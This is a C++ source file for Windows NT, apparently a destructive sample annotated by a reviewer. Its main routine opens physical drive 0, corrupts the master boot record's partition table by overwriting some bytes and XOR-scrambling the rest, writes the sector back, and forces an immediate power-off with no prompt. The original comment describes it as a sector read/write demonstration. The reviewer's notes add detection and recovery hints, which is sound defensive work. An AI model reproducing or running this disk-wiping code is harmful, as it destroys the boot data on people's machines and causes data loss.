// NT_LOG_DISK.cpp : Defines the entry point for the console application.
//
// NOTE(review): this listing is destructive. Run as-is on an NT-family
// system, it rewrites sector 0 (the MBR) of \\.\PHYSICALDRIVE0 with a damaged
// partition table and then forces a power-off, with no prompt or confirmation.
// Treat it as a sample for analysis and detection work, not as a utility.

#include "stdafx.h"
// The header names on the next line were lost when the page was extracted.
#include#include

// Original author's description: demonstrates how to read and write physical
// hard-disk sectors under Windows NT/2000.
//---------------------------------------------------------------------------

// Enables the shutdown privilege on the current process token and, if the
// adjustment call reports success, forces an immediate power-off.
//
// Observable behaviour for defenders: SE_SHUTDOWN_NAME being enabled by a
// console process, followed by ExitWindowsEx with EWX_FORCE|EWX_POWEROFF
// (running applications are not given the chance to refuse or save state).
void WINAPI ExitWin()
{
    HANDLE hProcess, hToken;
    TOKEN_PRIVILEGES NewState;
    DWORD ProcessId, ReturnLength = 0;   // ReturnLength is never used below
    LUID luidPrivilegeLUID;

    // Open a handle to our own process, then its access token.
    ProcessId = GetCurrentProcessId();
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);
    OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES, &hToken);

    // Resolve the LUID of the shutdown privilege and mark it enabled.
    LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &luidPrivilegeLUID);
    NewState.PrivilegeCount = 1;
    NewState.Privileges[0].Luid = luidPrivilegeLUID;
    NewState.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    // Power off only when the privilege adjustment call returns non-zero.
    if(AdjustTokenPrivileges(hToken, FALSE, &NewState, NULL, NULL, NULL))
        ExitWindowsEx(EWX_FORCE|EWX_POWEROFF, 0);
}

// Reads the first 512 bytes of physical drive 0, alters the partition-table
// area in memory, writes the 512 bytes back to the same drive, then calls
// ExitWin() to power the machine off.
//
// What changes in the sector (offsets are relative to the start of sector 0):
//   0x1be         set to 0x80
//   0x1bf         set to 0x00
//   0x1c2         set to 0x05
//   0x1c3..0x1fd  each byte XORed with a constant
//   0x000..0x1bd, 0x1c0..0x1c1 and 0x1fe..0x1ff are written back unchanged.
//
// Notes for detection and response:
//   - The distinguishing events are a user-mode process opening
//     \\.\PHYSICALDRIVE0 with GENERIC_WRITE and issuing a 512-byte write at
//     offset 0, followed by the forced power-off in ExitWin().
//   - Opening a physical drive for writing normally requires administrative
//     rights on NT-family Windows, so least-privilege accounts limit exposure.
//   - The XOR is its own inverse, so the bytes at 0x1c3..0x1fd can be restored
//     by applying the same byte-wide XOR again; the three bytes overwritten
//     with constants are not saved anywhere by this code and have to come
//     from a backup or be reconstructed.
void WINAPI KillNT()
{
    HANDLE hDevice;
    TCHAR szDevicename[64];
    LPTSTR szBuff;
    DISK_GEOMETRY Geometry;
    BOOL bRet;
    DWORD bytes,bread,count;
    int i;
    char *drive = "0";   // hard-coded: always the first physical disk

    // Build the raw device path \\.\PHYSICALDRIVE0 and open it read/write.
    wsprintf(szDevicename,"\\\\.\\PHYSICALDRIVE%c",*drive);
    hDevice = CreateFile( szDevicename,
                          GENERIC_READ|GENERIC_WRITE,
                          FILE_SHARE_READ|FILE_SHARE_WRITE,
                          NULL,
                          OPEN_EXISTING,
                          0,
                          NULL
                        );
    if (hDevice == INVALID_HANDLE_VALUE)
    {
        // Message text: "error opening device"
        MessageBox(NULL,"打开设备出错",NULL,MB_OK);
        ExitProcess(0);
    }

    // Request a lock on the opened device, then query its geometry.
    // Neither result is inspected.
    DeviceIoControl(hDevice,FSCTL_LOCK_VOLUME, NULL,0,NULL,0,&count,NULL);
    DeviceIoControl(hDevice,IOCTL_DISK_GET_DRIVE_GEOMETRY,NULL,0,&Geometry,
                    sizeof(DISK_GEOMETRY),&count,NULL);

    // Zero-filled buffer sized from the reported sector size; the transfers
    // below always use a fixed 512 bytes.
    szBuff = (LPSTR)HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,Geometry.BytesPerSector);
    if ( szBuff == NULL)
    {
        // Message text: "memory allocation error"
        MessageBox(NULL,"分配内存出错",NULL,MB_OK);
        ExitProcess(0);
    }

    // Read sector 0 (the handle was just opened, so the read starts at offset 0).
    bytes = 512;
    bRet = ReadFile(hDevice, szBuff, bytes, &bread, NULL);
    if (bRet==FALSE || bread<512)
    {
        // Message text: "error reading MBR"
        MessageBox(NULL,"读MBR出错",NULL,MB_OK);
        ExitProcess(0);
    }

    // In the classic MBR layout the partition table starts at 0x1be; these
    // three stores hit the first entry's status, start-head and type bytes.
    *(szBuff + 0x1be) =(char) 0x80;
    *(szBuff + 0x1bf) = 0x00;
    *(szBuff + 0x1c2) = 0x05;

    // Scramble the rest of the table up to, but not including, the two
    // signature bytes at 510..511.
    // NOTE(review): assuming an ANSI build where TCHAR is char, only the low
    // byte of 0x926 (0x26) takes part in the XOR.
    for ( i = 0x1c3; i < 510; i++ )
    {
        *(szBuff + i) ^= 0x926; //XOR
    }

    DeviceIoControl(hDevice,FSCTL_UNLOCK_VOLUME, NULL,0,NULL,0,&count,NULL);
    CloseHandle(hDevice);

    // Reopen the same device so the write below starts again at offset 0.
    wsprintf(szDevicename,"\\\\.\\PHYSICALDRIVE%c",*drive);
    hDevice = CreateFile( szDevicename,
                          GENERIC_READ|GENERIC_WRITE,
                          FILE_SHARE_READ|FILE_SHARE_WRITE,
                          NULL,
                          OPEN_EXISTING,
                          0,
                          NULL
                        );
    if ( hDevice == INVALID_HANDLE_VALUE)
    {
        // Message text: "error opening device"
        MessageBox(NULL,"打开设备出错",NULL,MB_OK);
        ExitProcess(0);
    }

    DeviceIoControl(hDevice,FSCTL_LOCK_VOLUME, NULL,0,NULL,0,&count,NULL);
    DeviceIoControl(hDevice,IOCTL_DISK_GET_DRIVE_GEOMETRY,NULL,0,&Geometry,
                    sizeof(DISK_GEOMETRY),&count,NULL);

    // Write the modified 512 bytes back over sector 0. This is the
    // destructive step.
    bRet = WriteFile(hDevice,szBuff,bytes,&bread,NULL);
    if (bRet==FALSE || bread<512)
    {
        // Message text: "error writing MBR"
        MessageBox(NULL,"写MBR出错",NULL,MB_OK);
        ExitProcess(0);
    }

    DeviceIoControl(hDevice,FSCTL_UNLOCK_VOLUME, NULL,0,NULL,0,&count,NULL);
    HeapFree(GetProcessHeap(),HEAP_NO_SERIALIZE,szBuff);
    CloseHandle(hDevice);

    // Power the machine off immediately after the write.
    ExitWin();
}

// Platform gate: queries the OS version and calls KillNT() only when the
// platform id is VER_PLATFORM_WIN32_NT. On any other result it does nothing.
void WINAPI OSVer()
{
    OSVERSIONINFO osi;
    osi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
    if (GetVersionEx(&osi))
    {
        if ( osi.dwPlatformId == VER_PLATFORM_WIN32_NT)
            KillNT();
    }
}

// Disabled logging helper left in by the author; it is not compiled.
/*int WriteToLog(char* str)
{
    FILE* log;
    log = fopen(LOGFILE, "a+");
    if(log == NULL)
    {
        log = fopen(LOGFILE, "w");
        if(log == NULL)
            return -1;
    }
    fprintf(log, "%s", str);
    fclose(log);
    return 0;
}
*/

// Entry point: takes no input from argv and asks for no confirmation before
// calling OSVer(), which leads straight into KillNT() on NT-family systems.
int main(int argc, char* argv[])
{
    OSVer();
    printf("\n");
    return 0;
}